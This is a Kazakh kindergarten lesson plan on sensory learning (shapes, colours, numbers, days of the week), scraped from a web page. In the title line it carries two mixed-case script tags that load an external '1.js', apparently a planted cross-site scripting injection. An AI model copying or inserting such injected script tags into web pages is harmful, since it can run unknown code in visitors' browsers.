Кіріктірілген ұйымдастырылған іс-әрекеті «Сенсорика әлеміне саяхат» Дайындап өткізген тәрбиеші: Серикова А.Ж Логопед: Тулегенова Б.К. Музыка жетекшісі: Бейсембаева А.А.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.04.2023

«Сенсорика әлеміне саяхат»

 

Күні: 31.03.23ж

Білім беру саласы: Таным.

Бөлімі: Сенсорика

Тақырыбы : «Сенсорика әлеміне саяхат»

Мақсаты : Геометриялық пішіндерді бір-бірінен ажырата білуге, түстер, сандар туралы білімдерін кеңейтуге, үлкен-кішкентай, ұғымдарын бекіту. Ойлау қабілеттерін, қиялын, есте сақтап түсіну, сұрақтарға жауап беру дағдысын қалыптастыру.Балалардың білімге деген қызығушылығын арттыру, бірлікке, татулыққа тәрбиелеу.

Қажетті құралдар: Көрнекіліктер,шарлар,түрлі-түсті макарон,фетрдан жасалған пішіндер.

Ұйымдастырылған оқу іс-әрекеті: Түсіндіру, көрсету,сұрақ-жауап,ойын

Сөздік жұмыс: Сары-қызыл,көк-жасыл.

Ұйымдастыру: Топпен

 

Балалар бүгін бізге қонаққа апайлар келді,амандасып кетейік.

-Сәлеметсіздер ме!

Шаттық шеңбері:

Табиғат біздің анамыз,

Табиғатқа баламыз,

Иіліп сәлем береміз,

Біз әдепті баламыз.

Тәрбиеші: Жарайсыңдар балалар.

-Бізде қазір қай жыл мезгілі?  (Көктем)

-Көктемде қандай өзгерістер болады?

- 1 аптада неше күн бар? ( 7 күн бар,Дүйсенбі,сейсенбі,сәрсенбі,бейсенбі,жұма,сенбі,жексенбі).

 

Тәрбиеші: Енді балалар тақтаға назар аударамыз.

-(сандар 1 ден 10-ға дейін)

-(Пішіндер)

-(Түстер)

Балалар: Тәрбиешінің сұрақтарына жауап береді.

Тәрбиеші: -Керемет, балалар, сендер түстерді ажырата біледі екенсіңдер.

Ал, ендеше, пішіндерді ажыра алады ма екенсіңдер көрейік.

-Тәрбиеші, балаларға пішіндерді көрсетеді, ал балалар олардың қандай пішін екенін және олардың қандай заттарға ұқсайтынын айтулары керек,түстерін атайды.

 

Тәрбиеші:  Балалар, енді мына суреттерге назар аударайықшы.

-Балалар суретте не бейнеленіп тұрғанын, неше зат екенін екенін айтып, сандар туралы ұғымдарын қалыптастырады.

Тәрбиеші: Жарайсыңдар балалар.

Тәрбиеші: Ал енді балалар саяхатқа барайық. Бізді бірнеше аялдамалар күтіп тұр.Онда бізге тапсырмалар болады.

1-Аялдама

(Жеміс ағашы, онда алма мен алмұрты орналыстырып, неше алма неше алмұрт бар екенін анықтау).

2-Аялдама

(Пішіндерді түстері қарай орындарына орналыстыр)

3-Аялдама

(Көбелекті құрастыр, қызыл,сары,көк,жасыл түстер)

-Жарайсыңдар балалар!

Сендер барлық тапсырмаларды дұрыс орындап, ең соңғы аялдамамыз «Шығармашылық» аялдамасына келдік. Орындарымызға отырайық. Әр үстелдің үстінде әр түрлі шығармашылық тапсырмалары берілген.

 

(Музыка әуені қойылады).Балалар жұмыс жасайды.

 

Тәрбиеші: Өте жақсы балалар, енді қол ұстасып, бір- біріміздің жүрек жылуымызды сезініп, қонақтар мен қоштасайық. Сау болыңыздар!

 

Тәрбиеші: Серикова А.Ж

Логопед: Тулегенова Б.К.

Музыка жетекшісі: Бейсембаева А.А.

 

Просмотров: 758


Пікір қосу



Деректерді қолтаңбаға қосу